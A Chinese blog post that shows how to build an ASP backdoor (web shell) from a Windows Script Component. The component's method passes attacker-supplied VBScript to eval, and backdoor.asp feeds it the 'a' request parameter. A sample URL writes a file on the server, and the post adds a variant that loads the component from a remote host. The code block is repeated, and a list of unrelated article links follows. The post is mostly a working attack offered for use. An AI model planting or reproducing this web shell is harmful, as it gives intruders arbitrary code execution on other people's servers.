利用wsc制作的一个asp后门
2008-12-12 14:07
573 查看
<?xml version="1.0" encoding="gb2312" standalone="yes"?>
<?component error="true" debug="true"?>
<package>
<component id="haiyangtop">
<public>
<method name="lcx"><parameter name="b"/></method>
</public>
<script language="VBScript"><![CDATA[
sub lcx(b)
eval(b)
end sub
]]>
</script>
</component>
</package>
backdoor.asp内容如下:
<%
b=request("a")
Set fs = GetObject("script:d:/web/ScriptCodingInfo.wsc#haiyangtop")
fs.lcx(b)
%>
调用方法如下:http://url/backdoor.asp?a=CreateObject("Scripting.FileSystemObject").OpenTextFile("c:\1122.txt"),8,True,0).WriteLine("123")
注意这里的a=只能是vbs的代码,不可以接受像response、rquest之类的asp的东东。
如果是2000服务器可以在backdoor.asp远程调用ScriptCodingInfo.wsc,像
Set fs = GetObject("script:http://www.xx.com/ScriptCodingInfo.wsc#haiyangtop"),2003服务器中不可以。
算一个思路,鸡肋,谁有更好的办法完善,能够直接调用cs的asp木马的c端就好了。
<?component error="true" debug="true"?>
<package>
<component id="haiyangtop">
<public>
<method name="lcx"><parameter name="b"/></method>
</public>
<script language="VBScript"><![CDATA[
sub lcx(b)
eval(b)
end sub
]]>
</script>
</component>
</package>
backdoor.asp内容如下:
<%
b=request("a")
Set fs = GetObject("script:d:/web/ScriptCodingInfo.wsc#haiyangtop")
fs.lcx(b)
%>
调用方法如下:http://url/backdoor.asp?a=CreateObject("Scripting.FileSystemObject").OpenTextFile("c:\1122.txt"),8,True,0).WriteLine("123")
注意这里的a=只能是vbs的代码,不可以接受像response、rquest之类的asp的东东。
如果是2000服务器可以在backdoor.asp远程调用ScriptCodingInfo.wsc,像
Set fs = GetObject("script:http://www.xx.com/ScriptCodingInfo.wsc#haiyangtop"),2003服务器中不可以。
算一个思路,鸡肋,谁有更好的办法完善,能够直接调用cs的asp木马的c端就好了。
您可能感兴趣的文章:
相关文章推荐
- [ASP.NET]制作一个简单的多页Tab功能 -Ajax也可以按照这个来做
- [导入]在asp.net中利用FileUplad控件从同一个页面上传多个文件
- ASP.NET制作一个简单的等待窗口
- 【学习中的分享】 iOS利用UILabel和UIButton制作一个简单的计算器
- Asp.net制作一个简单的等待窗口
- 利用ASP.NET的menu和SQL数据库制作无限级别菜单
- 利用OpenCV制作一个画画软件
- RSS制作阅读器(利用RssToolkit for asp.net 2.0)
- 利用Bootstrap制作一个流行的网页
- 怎么利用ultraISO对一个文件夹制作ISO镜像
- 利用windows的计划任务制作一个定时执行的清理端口任务
- C++ 利用函数, 制作一个三角函数表
- 利用PHP+Mysql数据库制作一个基本的留言板能够让客户进行留言
- C# Asp.net 制作一个windows服务
- 利用APPLICATION对象的应用,制作简单聊天室 - [asp.net]
- Android利用布局来制作一个简易计算器
- 一个PDF合并操作实现类,利用iTextSharp控件实现(http://www.diybl.com/course/4_webprogram/asp.net/asp_netxl/2008109/149644.html)
- 用asp能否制作出一个局域网聊天室?
- 利用fis3自动化处理asp.net项目静态资源时遇到的一个编码问题
- [导入]利用C#制作一个文件连接小工具[Longever原创]